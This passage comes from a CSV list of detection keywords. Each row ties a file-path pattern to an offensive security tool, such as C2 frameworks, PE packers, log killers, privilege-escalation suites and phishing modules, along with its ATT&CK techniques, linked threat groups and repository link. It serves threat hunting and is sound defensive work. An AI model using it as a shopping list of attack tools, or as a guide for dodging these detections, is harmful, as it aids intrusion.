security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/PE/InjectPE.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/pe_to_shellcode*,offensive_tool_keyword,pe_to_shellcode,Converts PE into a shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/hasherezade/pe_to_shellcode,1,1,N/A,N/A,10,2007,402,2023-08-15T14:42:12Z,2018-08-19T22:57:07Z -*/pe2shc.exe*,offensive_tool_keyword,exe_to_dll,Converts a EXE into DLL,T1027.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hasherezade/exe_to_dll,1,1,N/A,5,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*/pe2shc/*,offensive_tool_keyword,pe_to_shellcode,Converts PE into a shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/hasherezade/pe_to_shellcode,1,1,N/A,N/A,10,2007,402,2023-08-15T14:42:12Z,2018-08-19T22:57:07Z -*/PEASS-ng.git*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*/PEASS-ng/*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome 
Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*/PeerToPeerService.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/peinjector*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/peinjector.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/pentest*,offensive_tool_keyword,_,pentest keyword detection. detect potential pentesters using this keyword in file name. repository or command line,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/PE-Obfuscator*,offensive_tool_keyword,PE-Obfuscator,PE obfuscator with Evasion in mind,T1027 - T1055 - T1140 - T1564.003 - T1027.002,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/PE-Obfuscator,1,1,N/A,N/A,2,196,38,2023-04-25T04:58:12Z,2023-04-25T04:00:15Z -*/perf_swevent64*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/persist.tpl*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*/PersistBOF/*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*/Persistence.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*/Persistence.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*/persistence/*.ps1,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1133,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/persistence/*.psm1,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1134,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/Persistence/InstallUtil.*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/persistence2.rc*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/peterspbr/dirty-pipe-otw*,offensive_tool_keyword,POC,POC exploitation for 
dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/peterspbr/dirty-pipe-otw,1,1,N/A,N/A,1,1,0,2022-03-10T03:42:15Z,2022-03-09T17:21:17Z -*/PetitPotam.git*,offensive_tool_keyword,petipotam,PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.,T1557.001 - T1021,TA0008,N/A,N/A,Network Exploitation tools,https://github.com/topotam/PetitPotam,1,1,N/A,N/A,10,1590,272,2023-07-23T17:07:07Z,2021-07-18T18:19:54Z -*/PEzor.cna*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/PEzor.git*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/PEzor.sh *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation 
tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/PEzor/inject.cpp*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/pfsense_clickjacking*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/pgsql-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Phant0m.git*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,1,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*/phant0m-exe*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,1,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*/phishing.py*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/Phishing.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z 
-*/phishing/*.html*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/phishing/password_box*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/PhishingServer/*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*/pid:1337 */dll:*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*/ping6.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/PipeViewer.exe*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*/PipeViewer.git*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*/PipeViewer.sln*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - 
TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*/PipeViewer/Program.cs*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,1,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*/pitty_tiger.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/pivotnacci.git*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - 
Persistence,https://github.com/blackarrowsec/pivotnacci,1,1,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*/pivotnaccilib*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,0,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*/pjl-info-config.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/nccgroup/nmap-nse-vulnerability-scripts,1,1,N/A,N/A,7,620,64,2022-03-04T09:08:55Z,2021-05-18T15:20:30Z -*/pjl-ready-message.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/pkg/state/sudoers.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. 
